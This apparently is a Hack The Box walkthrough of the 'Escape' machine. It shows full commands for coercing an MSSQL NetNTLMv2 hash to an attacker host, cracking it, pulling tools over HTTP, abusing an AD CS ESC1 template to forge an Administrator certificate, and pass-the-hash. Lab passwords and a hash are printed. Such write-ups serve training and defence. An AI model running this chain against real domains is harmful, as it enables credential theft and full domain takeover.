Escape | Hack The Box Walkthrough | OSCP Style

Chaining an MSSQL NetNTLMv2 capture, a leaked log password, and an AD CS ESC1 certificate-template abuse to reach Domain Admin.

Chaining an MSSQL NetNTLMv2 capture, a leaked log password, and an AD CS ESC1 certificate-template abuse to reach Domain Admin.

Escape is a brilliant Active Directory machine that culminates in one of the most impactful modern AD attacks: abusing a misconfigured Active Directory Certificate Services (AD CS) template (the well-known ESC1). Along the way we capture and crack a service account’s NetNTLMv2 hash through MSSQL, recover a second user’s password from a leftover log file, and finally forge a certificate that lets us authenticate as the Domain Administrator. Let’s dig in.

Reconnaissance

We begin with a full TCP scan that fingerprints services and runs the default scripts:

nmap -p- --open -sS -sV -sC --min-rate 5000 -n 10.10.11.202 -oN result.txt

Figure 1. Full nmap scan revealing a domain controller for the sequel.htb domain.

Figure 2. Additional service detail from the nmap scan, including MSSQL and SMB.

The host is a domain controller for sequel.htb, and crucially it exposes both SMB and Microsoft SQL Server. Two great places to start enumerating.

SMB Enumeration

Listing the shares anonymously reveals a readable Public share:

smbclient -L 10.10.11.202 -N

Figure 3. Enumerating SMB shares anonymously; the Public share is accessible.

Inside the Public share we find a document, SQL Server Procedures.pdf, which we download:

smbclient //10.10.11.202/Public -N
mget "SQL Server Procedures.pdf"

Figure 4. Downloading the SQL Server Procedures PDF from the Public share.

The PDF is effectively an internal how-to for connecting to the SQL Server, and it conveniently includes a set of guest credentials (PublicUser / GuestUserCantWrite1) intended for read-only access.

Figure 5. The PDF leaks guest MSSQL credentials and connection instructions.

MSSQL Access & NetNTLMv2 Capture

We log in to the SQL Server with Impacket’s mssqlclient using the leaked credentials:

impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202

Figure 6. Authenticating to MSSQL as the low-privileged PublicUser.

Figure 7. Initial enumeration inside the SQL Server context.

Our SQL access is limited, but it’s enough to coerce authentication. The stored procedure xp_dirtree lists the contents of a directory, and if we point it at a UNC path on our own machine, the SQL service account will try to authenticate to us. We catch that authentication with Responder, capturing the account's NetNTLMv2 hash. First, we start Responder on our interface:

sudo responder -I tun0

Then, from the SQL session, we trigger the connection back to us:

EXEC xp_dirtree '\\10.10.14.9\share'

Figure 8. Forcing the SQL service account to authenticate to us via xp_dirtree.

Figure 9. Responder captures the SQL_SVC account’s NetNTLMv2 hash.

We crack the captured NetNTLMv2 hash with Hashcat (mode 5600) against rockyou.txt:

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force

Figure 10. Hashcat recovers the cleartext password for the SQL_SVC account.

Initial Foothold

We confirm the recovered credentials work over WinRM and then log in:

crackmapexec winrm 10.10.11.202 -u 'SQL_SVC' -p 'REGGIE1234ronnie'

Figure 11. CrackMapExec validates the SQL_SVC credentials over WinRM.

evil-winrm -i 10.10.11.202 -u 'SQL_SVC' -p 'REGGIE1234ronnie'

Figure 12. Interactive shell obtained as SQL_SVC via evil-winrm.

Lateral Movement

Exploring the file system as SQL_SVC, we find SQL Server log files. Backups of the error log often contain interesting data, and this box is no exception:

Figure 13. Locating the SQL Server log directory and a backed-up error log.

Reading the backed-up error log reveals a classic mistake: a user typed their password into the username field during a failed login attempt, and the failed authentication was logged in cleartext. The log exposes the credentials for Ryan.Cooper.

type ERRORLOG.BAK

Figure 14. The error log leaks Ryan.Cooper’s password, entered into the username field on a failed login.

We validate the new credentials and pivot to Ryan.Cooper, who holds the user flag:

crackmapexec winrm 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'

Figure 15. CrackMapExec confirms Ryan.Cooper’s credentials over WinRM.

evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'

Figure 16. Shell as Ryan.Cooper: the user flag is captured.

Enumerating the Path to Domain Admin

To find a privilege escalation route, we transfer enumeration tooling to the host. We host the files from Kali with a simple web server:

python3 -m http.server 80

Figure 17. Serving our tooling from Kali over HTTP.

We download and run winPEAS to survey the system:

wget hxxp://10.10.14.9/winPEASx64[.]exe -O winPEAS[.]exe

Figure 18. Transferring winPEAS to the target.

.\winPEAS[.]exe

Figure 19. Running winPEAS to enumerate misconfigurations: AD CS is present.

The presence of a Certificate Authority is a strong lead. We bring over Certify, the go-to tool for hunting vulnerable AD CS templates:

wget hxxp://10.10.14.9/Certify[.]exe -O Certify[.]exe

Figure 20. Transferring Certify[.]exe to the target.

AD CS Abuse: ESC1

We ask Certify to find templates we can abuse as the current user:

.\Certify[.]exe find /vulnerable /currentuser

Figure 21. Certify enumerating vulnerable certificate templates.

Figure 22. The vulnerable UserAuthentication template and its dangerous attributes.

Certify flags a template with a textbook ESC1 misconfiguration. Three attributes combine to make it exploitable:

  • msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT, the enrollee can specify an arbitrary subject (Subject Alternative Name). In other words, we can request a certificate on behalf of any user in the domain, including the Administrator.
  • pkiextendedkeyusage : Client Authentication, …, the resulting certificate can be used to authenticate to the domain. A subject we control plus an authentication-capable certificate is exactly what we need.
  • Enrollment Rights : sequel\Domain Users, any domain user is allowed to request this certificate, so our low-privileged account qualifies.

In short: ESC1 lets an unprivileged user request a certificate, set its identity to Administrator, and then use that certificate to authenticate as the Administrator. The CA happily signs it because the template trusts the enrollee to supply the subject.

We request a certificate from the CA, specifying the Administrator as the alternative name:

.\Certify[.]exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

Figure 23. Requesting a certificate as Administrator by abusing ENROLLEE_SUPPLIES_SUBJECT.

Figure 24. Certify returns the issued certificate and private key.

Certify outputs a PEM certificate and a private key. We combine them into a single PFX file that the next tool can consume (set an export password when prompted, or leave it blank):

openssl pkcs12 -in cert.pem -inkey private.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Figure 25. Converting the certificate and key into a PFX with OpenSSL.

Authenticating as Administrator

Back on the target, we bring over Rubeus and our freshly minted certificate:

wget hxxp://10.10.14.9/Rubeus[.]exe -O Rubeus[.]exe
wget http://10.10.14.9/cert.pfx -O cert.pfx

Figure 26. Transferring Rubeus and the certificate to the host.

We use Rubeus to request a Ticket Granting Ticket (TGT) with the certificate via PKINIT. The /getcredentials flag also retrieves the account's NTLM hash, which is even more convenient than the ticket itself:

.\Rubeus[.]exe asktgt /user:Administrator /certificate:cert.pfx /password: /getcredentials

Figure 27. Rubeus requesting a TGT for Administrator using the forged certificate.

Figure 28. Rubeus returns the Administrator’s TGT and, thanks to /getcredentials, the NTLM hash.

Domain Compromise

With the Administrator’s NTLM hash, we don’t need the password at all. We authenticate via Pass-the-Hash and capture the root flag:

evil-winrm -i 10.10.11.202 -u 'Administrator' -H 'A52F78E4C751E5F5E17E1E9F3E58F4EE'

Figure 29. Pass-the-Hash with evil-winrm yields an Administrator shell: the domain is compromised.

Conclusion

Escape is a superb showcase of how modern Active Directory falls, not to memory-corruption exploits, but to chained misconfigurations. We moved from a leaked PDF, to an MSSQL-coerced NetNTLMv2 capture, to a password carelessly logged in cleartext, and finally to the crown jewel: an AD CS template that trusted the enrollee to name its own subject. ESC1 remains one of the highest-impact findings on real engagements precisely because certificate-based authentication is so often overlooked.

Key takeaways:

  • Never store credentials in documents on readable shares.
  • MSSQL service accounts can be coerced into authenticating via xp_dirtree: capture and crack the hash.
  • SQL Server error logs can leak secrets; treat them as sensitive.
  • AD CS templates with ENROLLEE_SUPPLIES_SUBJECT + client-authentication EKU (ESC1) are a direct path to Domain Admin. Audit your templates with Certify or Certipy.

References

If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.